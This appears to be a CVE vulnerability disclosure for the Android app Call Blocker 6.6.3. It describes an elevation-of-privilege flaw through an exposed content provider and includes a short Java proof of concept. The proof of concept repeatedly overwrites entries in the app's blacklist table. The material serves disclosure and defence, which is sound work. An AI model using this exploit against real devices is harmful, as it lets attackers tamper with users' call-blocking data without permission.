Vendor:Fiorenza Francesco(https://www.call-blocker.info/)
Affected product:Call Blocker(com.cuiet.blockCalls)
Version:6.6.3
Download link: https://play.google.com/store/apps/details?id=com.cuiet.blockCalls
Description of the vulnerability for use in the CVE:The Call Blocker application 6.6.3 for Android allows attackers to tamper with feature-related data, resulting in a severe elevation of privilege attack.
poc:
public void attack(){
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
while (true) {
Uri uri = Uri.parse("content://com.cuiet.blockCalls.ContProvBlockCalls/tbBlackList");
ContentValues contentValues = new ContentValues();
contentValues.put("photo_uri","123456789");
contentValues.put("numeroContatto","987654321");
contentResolver.update(uri,contentValues,null,null);
}
}